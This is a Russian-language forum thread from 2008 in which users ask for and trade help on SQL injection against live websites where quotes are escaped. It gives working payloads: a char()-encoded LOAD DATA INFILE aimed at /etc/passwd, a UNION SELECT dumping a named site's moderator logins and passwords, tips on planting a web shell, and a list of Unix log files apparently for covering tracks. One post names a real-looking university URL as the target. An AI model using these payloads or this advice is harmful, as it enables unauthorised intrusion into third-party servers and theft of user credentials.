Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Для программистов и разработчиков » Базы данных
Страницы: 1
RSS
SQL Inject в случае экранирования кавычек
 
#1
Это нравится:0Да/0Нет
22.01.2008 17:18:03
Всем доброго времени суток. Вопрос адресую знатокам. Отправлять в гугл не нужно, так как хочу пообщаться. Задача такая. Есть возможность внедрять SQL-запросы на сайте, но загвоздка в том, что служебные символы экранируются. Внедрение возможно в двух запросах:

1. Update rubric Set rt = (rt + 1) Where id =<внедряемые команды>
2. Select Count(*) From firm Where id_rubric=<внедряемые команды>

Можно ли при перечисленных выше условиях выполнять системные команды на сервере? Что нужно для этого сделать? Да и вообще, что можно выудить?
 
 
 
#2
Это нравится:0Да/0Нет
23.01.2008 21:03:09
экранирование кавычек обходится через char(), aes_decrypt(aes_encrypt()), для начала проверьте есть привелегия file_priv (загрузите какой-нить файл через loadfile()), если с привелегиями повезет, можно создать веб-шелл...
 
 
 
#3
Это нравится:0Да/0Нет
25.01.2008 08:12:32
Спасибо за совет. Узнал имя пользователя, имя базы данных и версию MySQL. Но когда подставляю следующее занчение параметра:
rub="8; LOAD DATA INFILE char(47,101,116,99,47,112,97,115,115,119,100) INTO TABLE firm"
вываливается сообщение:

Select Count(*) From firm Where id_rubric=8; LOAD DATA INFILE char(47,101,116,99,47,112,97,115,115,119,100) INTO TABLE firm

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; LOAD DATA INFILE char(47,101,116,99,47,112,97,115,115,119,100) INTO TABLE firm' at line 1
says mySQL.
...and shutting...
 
 
 
#4
Это нравится:0Да/0Нет
25.01.2008 08:23:14
А когда забиваю параметр

rub=8 or rub=(select 1 from (select * from hernya.fignya) as t1

выдает ошибку:

ERROR in query:
Select Count(*) From firm Where id_rubric=8 or rub=(select 1 from (select * from hernya.fignya) as t1)
SELECT command denied to user 'k21club1_rbs'@'localhost' for table 'fignya'
says mySQL.
...and shutting...

Причем базы данных hernya нет, как нет и таблицы fignya.

Каких прав у меня нет? На запросы к другим базам?
 
 
 
#5
Это нравится:0Да/0Нет
18.02.2008 20:23:59
Если экранируются кавычки но есть привелегия filepriv то можно только просматривать файлы тоесть шел не залить а если нужен обход ковычек или спецсимволов то лучше всё писать в HEX'e
 
 
 
#6
Это нравится:0Да/0Нет
26.02.2008 02:37:15
itaim, в функциях php для mysql нельзя разделять запросы, причем ты должен понять что ты пытаешься сделать, тоесть ты содержимое файла хочешь засунуть в таблицу?
насчет rub=(select 1 from (select * from hernya.fignya) as t1) так и должно быть, к томуже еслиб даже такая бд и таблица была, у тебя бы все равно кучу ошибок выдало...

f_s_b_37, а как с помощью aes_decrypt(aes_encrypt()) обходить экранирование кавычек? ведь в функцию aes_encrypt() в таком случае надо значение в кавычках передавать
 
 
 
#7
Это нравится:0Да/0Нет
27.02.2008 10:58:42
Scipio, спасибо за ответ. Значит в одном вызове php-функции должен быть только один запрос. Понятно.
 
 
 
#8
Это нравится:0Да/0Нет
27.02.2008 20:18:20
Точно.
обхединять запрросы можно через union select...
 
 
 
#9
Это нравится:0Да/0Нет
19.04.2008 03:24:17
здрасте у меня ковычки новерно филруються и как залить шелл или вызвать его если знаю логин и пасс вообше что дальше помоги
adress зайди туда
http://www.kaznpu.kz/kz/?annons=-1
 
 
 
#10
Это нравится:0Да/0Нет
19.04.2008 03:27:03
и потставь еше это а то сздесь на форуме пасут
tam login and pass
+UNION+SELECT+concat_ws(0x3a,login,pswd,fio)+from+moderator/*
 
 
 
#11
Это нравится:0Да/0Нет
19.04.2008 03:38:32
/var/log - используется в некоторых версиях Solaris, LinuxBSD и FreeBSD.
/usr/adm - распространено среди систем ранних версий.
/var/adm - здесь содержаться логи более свежих систем.
/etc - большинство версий Юникс хранят utmp, некоторые wtmp с syslong.conf.


lastlog -- Логи последних логинов каждого пользователя, и иногда логи последних неверно введёных логинов.
loginlog -- Записи ввода всех неверных логинов.
messages -- Записи вывода на системную консоль (т.е. всё то, что пишет тебе на терминал система ) и другие сообщения от syslog.
security -- Запись всех атак, использующих uucp систему.
sulog -- Логи команды SU.
acct OR pacct -- Пишет команды, используемые каждым пользователем.
access_log -- Для серверов NCSA HTTPd. Этот лог хранит информацию о сайтах, контактируемых с сервером.
aculog -- Хранит записи исходящих модемных связей.
utmp -- Запись всех посещений системы пользователями.
utmpx -- Удлинённый utmp.
uucp -- содержит логи пересылок, различных контактов и активности пользователя.
vold.log -- сборщик внешних ошибок лог-файлов.
xferlog -- логи FTP доступов.
 
 
 
Страницы: 1
Читают тему